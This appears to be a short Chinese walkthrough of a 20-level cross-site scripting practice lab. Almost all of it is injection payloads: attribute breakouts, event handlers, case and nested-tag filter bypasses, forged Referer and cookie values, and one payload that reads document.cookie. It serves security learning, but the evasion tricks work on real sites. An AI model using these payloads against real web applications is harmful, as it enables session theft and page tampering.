1.构造xss直接过 :
2."><script>alert(1)</script>发现对 html 特殊符号进行了实体编码:
3.1' onclick=alert(1)//鼠标经过触发 :
4. 1' onclick=alert(1)//鼠标经过触发:
5. "><a href=javascript:alert(/xss/)>xss</a>:
6. 大小写绕过"><a Href=javascript:alert(/xss/)>xss</a>:
7. "><scrscriptipt>alert(/xss/)</scrscriptipt>:
8. javascript:alert():
9. javascript:alert(/xss/)http://:
10. ?keyword=well%20done!&t_sort=%22%20type=%22text%22%20onclick=%22alert%281%29:
11. 开始抓包伪造referer"onmouseover='alert(1)' type="text"
12. 同上思路 "onmouseover='alert(1)' type="text";
13.修改cookie:
14.
16.?keyword=<img%0asrc=x%0aonerror=alert(1)>:
17.?arg02=%20onmousedown=alert(2):
注:使用火狐可能出现问题;
18.同17;
19.level19.php?arg01=version&arg02=%3Ca%20href=%22javascript:alert(document.domain)%22%3Exss_by_SST%3C/a%3E:
20./level20.php?arg01=id&arg02=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//%26width%26height:
相关文章: